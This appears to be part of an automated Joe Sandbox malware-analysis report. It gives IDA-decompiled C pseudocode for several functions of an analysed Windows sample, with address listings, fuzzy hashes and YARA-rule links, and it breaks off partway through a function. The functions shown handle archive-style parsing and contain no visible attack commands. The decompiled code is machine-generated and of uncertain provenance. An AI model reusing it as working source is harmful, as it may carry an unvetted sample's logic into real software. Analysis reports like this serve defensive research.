					 *(_t284 - 0x1c) = E0040C281( *((intOrPtr*)(_t284 + 0x10)));
					_t256 =  *(_t284 - 0x1c);
					if( *(_t284 - 0x1c) !=  *(_t284 - 0x1c) || 0 != _t271) {
						E0040DB47(_t256);
					}
					E004076D5(_t282,  *(_t284 - 0x1c));
					_push(0x14);
					_t197 = E00403A76();
					_t283 = 0;
					if(_t197 != 0) {
						 *((intOrPtr*)(_t197 + 4)) = 0;
						 *_t197 = 0x41b824;
						_t283 = _t197;
					}
					_t294 = _t283;
					 *((intOrPtr*)(_t284 - 0x88)) = _t283;
					if(_t283 != 0) {
						 *((intOrPtr*)( *_t283 + 4))(_t283);
					}
					_t271 =  *(_t284 - 0x14);
					 *(_t283 + 0x10) =  *(_t283 + 0x10) & 0x00000000;
					 *((intOrPtr*)(_t283 + 8)) =  *((intOrPtr*)( *(_t284 - 0x10) + 8));
					 *(_t284 - 4) = 0xa;
					 *(_t283 + 0xc) =  *(_t284 - 0x1c);
					_t202 = E0040AD19(_t284 - 0x164, _t294,  *_t273, _t227,  *((intOrPtr*)(_t284 - 0x34)),  *(_t284 - 0x50) + _t271 * 8,  *((intOrPtr*)(_t284 + 0x10)), _t283, 0); // executed
					 *((intOrPtr*)(_t284 - 0x48)) = _t202;
					if(_t202 != 0) {
						break;
					}
					if( *((char*)( *((intOrPtr*)(_t284 + 0x10)) + 0x54)) != 0) {
						_t271 =  *(_t284 - 0x1c);
						_t220 = E004133B0( *((intOrPtr*)( *(_t284 - 0x10) + 8)), _t271);
						_t270 =  *((intOrPtr*)(_t284 + 0x10));
						if(_t220 !=  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x50))) {
							E0040DB47(_t270);
						}
					}
					 *(_t284 - 0x10) =  *(_t284 - 0x10) & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)) <= 0) {
						L14:
						 *(_t284 - 4) = 8;
						if(_t283 != 0) {
							 *((intOrPtr*)( *_t283 + 8))(_t283);
						}
						 *(_t284 + 0xc) =  *(_t284 + 0xc) + 1;
						_t301 =  *(_t284 + 0xc) -  *((intOrPtr*)(_t284 - 0x28));
						if( *(_t284 + 0xc) <  *((intOrPtr*)(_t284 - 0x28))) {
							continue;
						} else {
							goto L17;
						}
					} else {
						do {
							_t271 =  *(_t284 - 0x50);
							 *(_t284 - 0x14) =  *(_t284 - 0x14) + 1;
							_t267 =  *((intOrPtr*)(( *(_t284 - 0x14) << 3) + _t271));
							_t227 = _t227 + _t267;
							asm("adc [ebp-0x34], eax");
							 *((intOrPtr*)(_t273 + 0x48)) =  *((intOrPtr*)(_t273 + 0x48)) + _t267;
							asm("adc [edi+0x4c], eax");
							 *(_t284 - 0x10) =  *(_t284 - 0x10) + 1;
						} while ( *(_t284 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)));
						goto L14;
					}
				}
				__eflags = _t283;
				 *(_t284 - 4) = 8;
				if(__eflags != 0) {
					 *((intOrPtr*)( *_t283 + 8))(_t283);
				}
				 *(_t284 - 4) = 7;
				E0040C380(_t284 - 0x164, __eflags);
				 *(_t284 - 4) = 6;
				E004042AD(_t284 - 0x70);
				 *(_t284 - 4) = 5;
				E004042AD(_t284 - 0xb0);
				 *(_t284 - 4) = 4;
				E004042AD(_t284 - 0x9c);
				 *(_t284 - 4) = 3;
				E004042AD(_t284 - 0x84);
				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
				_t279 =  *((intOrPtr*)(_t284 - 0x48));
				 *(_t284 - 4) = 0xb;
				goto L18;
			}
















                                          0x0040ea0b
                                          0x0040ea0b
                                          0x0040ea10
                                          0x0040ea1e
                                          0x0040ea25
                                          0x0040ea2a
                                          0x0040ea31
                                          0x0040ea3d
                                          0x0040ea47
                                          0x0040ea55
                                          0x0040ea5f
                                          0x0040ea68
                                          0x0040ea6c
                                          0x0040ea71
                                          0x0040ea80
                                          0x0040ea85
                                          0x0040ea93
                                          0x0040ea98
                                          0x0040eaaa
                                          0x0040eaaf
                                          0x0040eaba
                                          0x0040eabf
                                          0x0040eac5
                                          0x0040eaf9
                                          0x0040eafd
                                          0x0040eb02
                                          0x0040eb0e
                                          0x0040eb18
                                          0x0040eb1b
                                          0x0040eb1e
                                          0x0040eb26
                                          0x0040eb29
                                          0x0040ec89
                                          0x0040ec8f
                                          0x0040ec93
                                          0x0040ec9b
                                          0x0040ec9f
                                          0x0040ecaa
                                          0x0040ecae
                                          0x0040ecb9
                                          0x0040ecbd
                                          0x0040ecc8
                                          0x0040eccc
                                          0x0040ecd1
                                          0x0040ecd8
                                          0x0040ecdc
                                          0x0040ecde
                                          0x0040ece1
                                          0x0040ece9
                                          0x0040eced
                                          0x0040ecf8
                                          0x0040ecfc
                                          0x0040ed01
                                          0x0040ed0b
                                          0x0040ed10
                                          0x0040ed17
                                          0x0040ed24
                                          0x0040ed2c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040eb2f
                                          0x0040eb2f
                                          0x0040eb35
                                          0x0040eb39
                                          0x0040eb45
                                          0x0040eb48
                                          0x0040eb51
                                          0x0040eb52
                                          0x0040eb56
                                          0x0040eb5e
                                          0x0040eb62
                                          0x0040eb65
                                          0x0040eb6a
                                          0x0040eb74
                                          0x0040eb7b
                                          0x0040eb83
                                          0x0040eb88
                                          0x0040eb8d
                                          0x0040eb93
                                          0x0040eb93
                                          0x0040eb9d
                                          0x0040eba2
                                          0x0040eba4
                                          0x0040eba9
                                          0x0040ebae
                                          0x0040ebb0
                                          0x0040ebb3
                                          0x0040ebb9
                                          0x0040ebb9
                                          0x0040ebbb
                                          0x0040ebbd
                                          0x0040ebc3
                                          0x0040ebc8
                                          0x0040ebc8
                                          0x0040ebce
                                          0x0040ebd7
                                          0x0040ebde
                                          0x0040ebe4
                                          0x0040ebe8
                                          0x0040ebff
                                          0x0040ec06
                                          0x0040ec09
                                          0x00000000
                                          0x00000000
                                          0x0040ec16
                                          0x0040ec1b
                                          0x0040ec21
                                          0x0040ec26
                                          0x0040ec2c
                                          0x0040ec2e
                                          0x0040ec2e
                                          0x0040ec2c
                                          0x0040ec36
                                          0x0040ec3e
                                          0x0040ec6c
                                          0x0040ec6e
                                          0x0040ec72
                                          0x0040ec77
                                          0x0040ec77
                                          0x0040ec7a
                                          0x0040ec80
                                          0x0040ec83
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040ec40
                                          0x0040ec40
                                          0x0040ec43
                                          0x0040ec49
                                          0x0040ec4c
                                          0x0040ec53
                                          0x0040ec55
                                          0x0040ec58
                                          0x0040ec5b
                                          0x0040ec5e
                                          0x0040ec67
                                          0x00000000
                                          0x0040ec40
                                          0x0040ec3e
                                          0x0040ed2f
                                          0x0040ed31
                                          0x0040ed35
                                          0x0040ed3a
                                          0x0040ed3a
                                          0x0040ed43
                                          0x0040ed47
                                          0x0040ed4f
                                          0x0040ed53
                                          0x0040ed5e
                                          0x0040ed62
                                          0x0040ed6d
                                          0x0040ed71
                                          0x0040ed7c
                                          0x0040ed80
                                          0x0040ed85
                                          0x0040ed8c
                                          0x0040ed8f
                                          0x00000000

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040EA10
                                            • Part of subcall function 0040FA43: __EH_prolog.LIBCMT ref: 0040FA48
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                                          • Instruction ID: 11288496f406677f7bdfcb919023cacd5b8123072d96ac47e6bfd322b071945c
                                          • Opcode Fuzzy Hash: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                                          • Instruction Fuzzy Hash: 38C14770910269DFDB10DFA5C884BDDBBB4BF14308F1080AEE915B72C2CB786A49CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F648 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E0040F648(intOrPtr* __ecx, void* __eflags) {
				char* _t92;
				signed char _t103;
				intOrPtr* _t104;
				signed char _t106;
				void* _t112;
				void* _t116;
				signed char _t120;
				void* _t124;
				signed int _t137;
				intOrPtr* _t144;
				void* _t145;
				void* _t164;
				signed char _t168;
				intOrPtr _t170;
				intOrPtr* _t173;
				signed char _t175;
				void* _t176;

				E00413954(E0041A7FC, _t176);
				_t170 =  *((intOrPtr*)(_t176 + 8));
				_t173 = __ecx;
				E0040D377(_t170);
				 *((intOrPtr*)(_t170 + 0x138)) =  *((intOrPtr*)(_t173 + 0x20));
				 *((intOrPtr*)(_t170 + 0x13c)) =  *((intOrPtr*)(_t173 + 0x24));
				_t92 = _t170 + 0x130;
				 *_t92 =  *((intOrPtr*)(_t173 + 0x2e));
				_t143 =  *((intOrPtr*)(_t173 + 0x2f));
				 *((char*)(_t170 + 0x131)) =  *((intOrPtr*)(_t173 + 0x2f));
				if( *_t92 != 0) {
					E0040DB47(_t143);
				}
				_t144 = _t173 + 0x34;
				 *((intOrPtr*)(_t176 + 8)) =  *((intOrPtr*)(_t173 + 0x30));
				_t137 =  *(_t173 + 0x40);
				 *((intOrPtr*)(_t176 - 0x18)) =  *_t144;
				 *((intOrPtr*)(_t176 - 0x14)) =  *((intOrPtr*)(_t144 + 4));
				 *(_t176 - 0x20) =  *(_t173 + 0x3c);
				_t164 = 0x14;
				 *((intOrPtr*)(_t176 - 0x10)) =  *((intOrPtr*)(_t173 + 0x44));
				if(E004133B0(_t144, _t164) !=  *((intOrPtr*)(_t176 + 8))) {
					E0040DB47(_t144);
				}
				_t145 = 0;
				 *((intOrPtr*)(_t170 + 0x140)) =  *((intOrPtr*)(_t173 + 0x20)) + 0x20;
				asm("adc edx, ecx");
				 *((intOrPtr*)(_t170 + 0x144)) =  *((intOrPtr*)(_t173 + 0x24));
				if(( *(_t176 - 0x20) | _t137) != 0) {
					__eflags = _t137 - _t145;
					if(_t137 > _t145) {
						L11:
						_t103 = 1;
					} else {
						__eflags =  *(_t176 - 0x20) - 0xffffffff;
						if( *(_t176 - 0x20) > 0xffffffff) {
							goto L11;
						} else {
							__eflags =  *((intOrPtr*)(_t176 - 0x14)) - _t145;
							if(__eflags > 0) {
								L12:
								_t104 =  *_t173;
								_t103 =  *((intOrPtr*)( *_t104 + 0x10))(_t104,  *((intOrPtr*)(_t176 - 0x18)),  *((intOrPtr*)(_t176 - 0x14)), 1, _t145);
								__eflags = _t103;
								if(_t103 == 0) {
									 *((intOrPtr*)(_t176 - 0x30)) = 0;
									 *((intOrPtr*)(_t176 - 0x2c)) = 0;
									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
									 *(_t176 - 4) = 0;
									E004076D5(_t176 - 0x34,  *(_t176 - 0x20));
									_t106 = E0040776F(__eflags,  *(_t176 - 0x20));
									__eflags = _t106;
									if(_t106 == 0) {
										_t168 =  *(_t176 - 0x20);
										asm("adc ecx, 0x0");
										 *((intOrPtr*)(_t173 + 0x48)) =  *((intOrPtr*)(_t173 + 0x48)) + _t168 + 0x20;
										asm("adc [esi+0x4c], ecx");
										_t151 =  *((intOrPtr*)(_t176 - 0x2c));
										asm("adc ebx, [ebp-0x14]");
										 *((intOrPtr*)(_t170 + 0x1c8)) = _t168 +  *((intOrPtr*)(_t176 - 0x18)) + 0x20;
										asm("adc ebx, 0x0");
										 *(_t170 + 0x1cc) = _t137;
										_t112 = E004133B0( *((intOrPtr*)(_t176 - 0x2c)), _t168);
										__eflags = _t112 -  *((intOrPtr*)(_t176 - 0x10));
										if(_t112 !=  *((intOrPtr*)(_t176 - 0x10))) {
											E0040DB47(_t151);
										}
										 *(_t176 - 0x24) =  *(_t176 - 0x24) & 0x00000000;
										 *(_t176 - 4) = 1;
										E0040DAE2(_t173, _t176 - 0x34);
										E004032A8(_t176 - 0x48, 4);
										 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
										_t154 =  *((intOrPtr*)(_t173 + 0x18));
										 *(_t176 - 4) = 2;
										_t116 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
										__eflags = _t116 - 1;
										if(_t116 != 1) {
											L19:
											__eflags = _t116 - 0x17;
											if(_t116 != 0x17) {
												L21:
												E0040DB47(_t154);
											} else {
												__eflags = _t168;
												if(__eflags != 0) {
													goto L21;
												}
											}
											_t155 = _t173;
											_t120 = E0040EA0B(_t173, _t168, __eflags,  *((intOrPtr*)(_t170 + 0x140)),  *((intOrPtr*)(_t170 + 0x144)), _t170 + 0x150, _t176 - 0x48); // executed
											__eflags = _t120;
											if(_t120 == 0) {
												__eflags =  *(_t176 - 0x40);
												if( *(_t176 - 0x40) != 0) {
													__eflags =  *(_t176 - 0x40) - 1;
													if( *(_t176 - 0x40) > 1) {
														E0040DB47(_t155);
													}
													E0040DA34(_t176 - 0x28);
													E0040DAE2(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x3c)))));
													_t158 =  *((intOrPtr*)(_t173 + 0x18));
													_t124 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
													__eflags = _t124 - 1;
													if(_t124 != 1) {
														L30:
														E0040DB47(_t158);
													} else {
														__eflags = _t168;
														if(_t168 != 0) {
															goto L30;
														}
													}
													goto L31;
												} else {
													 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
													 *(_t176 - 4) = 4;
													_t175 = 0;
												}
											} else {
												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
												 *(_t176 - 4) = 3;
												goto L32;
											}
										} else {
											__eflags = _t168;
											if(_t168 == 0) {
												L31:
												 *((intOrPtr*)(_t170 + 0x1c0)) =  *((intOrPtr*)(_t173 + 0x48));
												 *((intOrPtr*)(_t170 + 0x1c4)) =  *((intOrPtr*)(_t173 + 0x4c));
												_t120 = E0040ED98(_t173, _t168, _t170);
												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
												 *(_t176 - 4) = 5;
												L32:
												_t175 = _t120;
											} else {
												goto L19;
											}
										}
										E004042D6();
										 *(_t176 - 4) = 1;
										E004042AD(_t176 - 0x48);
										_t81 = _t176 - 4;
										 *_t81 =  *(_t176 - 4) & 0x00000000;
										__eflags =  *_t81;
										E0040DA34(_t176 - 0x28);
									} else {
										_t175 = _t106;
									}
									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
									E00403A9C( *((intOrPtr*)(_t176 - 0x2c)));
									_t103 = _t175;
								}
							} else {
								if(__eflags < 0) {
									goto L11;
								} else {
									__eflags =  *((intOrPtr*)(_t176 - 0x18)) - _t145;
									if( *((intOrPtr*)(_t176 - 0x18)) >= _t145) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t103 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t176 - 0xc));
				return _t103;
			}




















                                          0x0040f64d
                                          0x0040f658
                                          0x0040f65b
                                          0x0040f65f
                                          0x0040f667
                                          0x0040f670
                                          0x0040f679
                                          0x0040f67f
                                          0x0040f681
                                          0x0040f687
                                          0x0040f68d
                                          0x0040f68f
                                          0x0040f68f
                                          0x0040f697
                                          0x0040f69a
                                          0x0040f69d
                                          0x0040f6a4
                                          0x0040f6aa
                                          0x0040f6b0
                                          0x0040f6b6
                                          0x0040f6b7
                                          0x0040f6c2
                                          0x0040f6c4
                                          0x0040f6c4
                                          0x0040f6d4
                                          0x0040f6d5
                                          0x0040f6de
                                          0x0040f6e2
                                          0x0040f6e8
                                          0x0040f6f1
                                          0x0040f6f3
                                          0x0040f707
                                          0x0040f709
                                          0x0040f6f5
                                          0x0040f6f5
                                          0x0040f6f9
                                          0x00000000
                                          0x0040f6fb
                                          0x0040f6fb
                                          0x0040f6fe
                                          0x0040f70f
                                          0x0040f70f
                                          0x0040f71d
                                          0x0040f722
                                          0x0040f724
                                          0x0040f72a
                                          0x0040f72d
                                          0x0040f730
                                          0x0040f73a
                                          0x0040f740
                                          0x0040f74d
                                          0x0040f752
                                          0x0040f754
                                          0x0040f75d
                                          0x0040f767
                                          0x0040f76a
                                          0x0040f76f
                                          0x0040f775
                                          0x0040f778
                                          0x0040f77e
                                          0x0040f784
                                          0x0040f787
                                          0x0040f78d
                                          0x0040f792
                                          0x0040f795
                                          0x0040f797
                                          0x0040f797
                                          0x0040f79c
                                          0x0040f7a8
                                          0x0040f7ac
                                          0x0040f7b6
                                          0x0040f7c0
                                          0x0040f7c3
                                          0x0040f7c6
                                          0x0040f7ca
                                          0x0040f7cf
                                          0x0040f7d2
                                          0x0040f7dc
                                          0x0040f7dc
                                          0x0040f7df
                                          0x0040f7e5
                                          0x0040f7e5
                                          0x0040f7e1
                                          0x0040f7e1
                                          0x0040f7e3
                                          0x00000000
                                          0x00000000
                                          0x0040f7e3
                                          0x0040f7ed
                                          0x0040f803
                                          0x0040f808
                                          0x0040f80a
                                          0x0040f815
                                          0x0040f819
                                          0x0040f826
                                          0x0040f82a
                                          0x0040f82c
                                          0x0040f82c
                                          0x0040f834
                                          0x0040f842
                                          0x0040f847
                                          0x0040f84a
                                          0x0040f84f
                                          0x0040f852
                                          0x0040f858
                                          0x0040f858
                                          0x0040f854
                                          0x0040f854
                                          0x0040f856
                                          0x00000000
                                          0x00000000
                                          0x0040f856
                                          0x00000000
                                          0x0040f81b
                                          0x0040f81b
                                          0x0040f81e
                                          0x0040f822
                                          0x0040f822
                                          0x0040f80c
                                          0x0040f80c
                                          0x0040f80f
                                          0x00000000
                                          0x0040f80f
                                          0x0040f7d4
                                          0x0040f7d4
                                          0x0040f7d6
                                          0x0040f85d
                                          0x0040f861
                                          0x0040f86c
                                          0x0040f872
                                          0x0040f877
                                          0x0040f87a
                                          0x0040f87e
                                          0x0040f87e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040f7d6
                                          0x0040f883
                                          0x0040f88b
                                          0x0040f88f
                                          0x0040f894
                                          0x0040f894
                                          0x0040f894
                                          0x0040f89b
                                          0x0040f756
                                          0x0040f756
                                          0x0040f756
                                          0x0040f8a3
                                          0x0040f8aa
                                          0x0040f8b0
                                          0x0040f8b0
                                          0x0040f700
                                          0x0040f700
                                          0x00000000
                                          0x0040f702
                                          0x0040f702
                                          0x0040f705
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040f705
                                          0x0040f700
                                          0x0040f6fe
                                          0x0040f6f9
                                          0x0040f6ea
                                          0x0040f6ea
                                          0x0040f6ea
                                          0x0040f8b8
                                          0x0040f8c0

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                                          • Instruction ID: 8e2da863e0ec0aed1c7df7ef9f788bacddda9dad52c8f94b50dff24b72cd6dff
                                          • Opcode Fuzzy Hash: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                                          • Instruction Fuzzy Hash: A7814A71E006059BCB24EBA9C481ADEFBB0BF48304F14453EE445B3791DB38A949CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C783 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040C783(void* __ecx) {
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr _t83;
				signed int _t97;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				void* _t104;

				E00413954(E0041A330, _t104);
				_t100 = __ecx;
				_t59 =  *((intOrPtr*)(__ecx + 0x28));
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
					 *(_t104 - 0x10) = 2;
				} else {
					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
				}
				 *((intOrPtr*)(_t104 - 0x14)) = 0;
				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
				 *(_t104 - 4) = 0;
				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
				if(_t61 == 0) {
					E0040640D( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
					_t64 =  *((intOrPtr*)(_t100 + 0xc));
					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
					 *((intOrPtr*)(_t64 + 0x10)) = 0;
					 *((intOrPtr*)(_t64 + 0x14)) = 0;
					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
					_t83 =  *((intOrPtr*)(_t100 + 0x14));
					 *((char*)(_t100 + 0x2e)) = 1;
					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
						 *(_t104 - 0x10) = 2;
					}
					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					_t102 = _t68;
					_t69 =  *((intOrPtr*)(_t104 - 0x14));
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 8))(_t69);
					}
					_t70 = _t102;
				} else {
					_t72 =  *((intOrPtr*)(_t104 - 0x14));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t70 =  *((intOrPtr*)(_t104 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t70;
			}


















                                          0x0040c788
                                          0x0040c792
                                          0x0040c79a
                                          0x0040c7a3
                                          0x0040c7b2
                                          0x0040c7a5
                                          0x0040c7ad
                                          0x0040c7ad
                                          0x0040c7b9
                                          0x0040c7c5
                                          0x0040c7c7
                                          0x0040c7ce
                                          0x0040c7d7
                                          0x0040c7dc
                                          0x0040c7df
                                          0x0040c803
                                          0x0040c808
                                          0x0040c80e
                                          0x0040c812
                                          0x0040c815
                                          0x0040c818
                                          0x0040c81b
                                          0x0040c81e
                                          0x0040c828
                                          0x0040c82d
                                          0x0040c833
                                          0x0040c836
                                          0x0040c855
                                          0x0040c855
                                          0x0040c85c
                                          0x0040c865
                                          0x0040c868
                                          0x0040c86c
                                          0x0040c86e
                                          0x0040c873
                                          0x0040c878
                                          0x0040c878
                                          0x0040c87b
                                          0x0040c7e1
                                          0x0040c7e1
                                          0x0040c7e4
                                          0x0040c7ea
                                          0x0040c7ef
                                          0x0040c7ef
                                          0x0040c7f2
                                          0x0040c7f2
                                          0x0040c883
                                          0x0040c88b

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                                          • Instruction ID: af1ffdf326ee6b9e8f9f4efb185a7a75328b0af80e7613720a9e9424578e33b6
                                          • Opcode Fuzzy Hash: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                                          • Instruction Fuzzy Hash: A9416D71A00646CFCB24DF58C48496ABBF1FF48314B2486AED096AB392C371ED46CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D1AB Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E0040D1AB() {
				intOrPtr* _t44;
				intOrPtr _t50;
				void* _t61;
				intOrPtr* _t62;
				void* _t75;
				intOrPtr _t76;
				void* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t84;

				E00413954(E0041A550, _t82);
				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t82 + 8));
				 *((intOrPtr*)(_t82 - 0x10)) = _t84 - 0x58;
				 *((intOrPtr*)( *_t62 + 0x10))(_t62, _t75, _t79, _t61);
				_t80 =  *((intOrPtr*)(_t82 + 0x14));
				 *(_t82 - 4) = 1;
				_t87 = _t80;
				 *((intOrPtr*)(_t82 - 0x14)) = _t80;
				if(_t80 != 0) {
					 *((intOrPtr*)( *_t80 + 4))(_t80);
				}
				 *(_t82 - 0x64) =  *(_t82 - 0x64) & 0x00000000;
				 *(_t82 - 4) = 3;
				E00402155(_t82 - 0x60);
				 *((intOrPtr*)(_t82 - 0x60)) = 0x41b808;
				_push( *((intOrPtr*)(_t82 + 0x10)));
				 *(_t82 - 4) = 4;
				_t76 = E0040DF69(_t82 - 0x64, _t82, _t87,  *((intOrPtr*)(_t82 + 0xc)));
				_t88 = _t76;
				if(_t76 == 0) {
					_t77 = _t62 + 0x10;
					_push(_t62 + 0x10); // executed
					_t44 = E0040F8C3(_t82 - 0x64, __eflags); // executed
					__eflags = _t44;
					 *((intOrPtr*)(_t82 + 0x14)) = _t44;
					if(__eflags == 0) {
						E0040F4D8(_t77);
						E0040F51A();
						E0040F56F(_t77);
						E0040640D(_t62 + 8,  *((intOrPtr*)(_t82 + 0xc)));
						 *(_t82 - 4) = 2;
						E0040D2CF(_t82 - 0x64, __eflags);
						__eflags = _t80;
						 *(_t82 - 4) = 1;
						if(_t80 != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						_t50 = 0;
					} else {
						 *(_t82 - 4) = 2;
						E0040D2CF(_t82 - 0x64, __eflags);
						__eflags = _t80;
						 *(_t82 - 4) = 1;
						if(_t80 != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						_t50 =  *((intOrPtr*)(_t82 + 0x14));
					}
				} else {
					 *(_t82 - 4) = 2;
					E0040D2CF(_t82 - 0x64, _t88);
					 *(_t82 - 4) = 1;
					if(_t80 != 0) {
						 *((intOrPtr*)( *_t80 + 8))(_t80);
					}
					_t50 = _t76;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
				return _t50;
			}













                                          0x0040d1b0
                                          0x0040d1b8
                                          0x0040d1bd
                                          0x0040d1c4
                                          0x0040d1c8
                                          0x0040d1cb
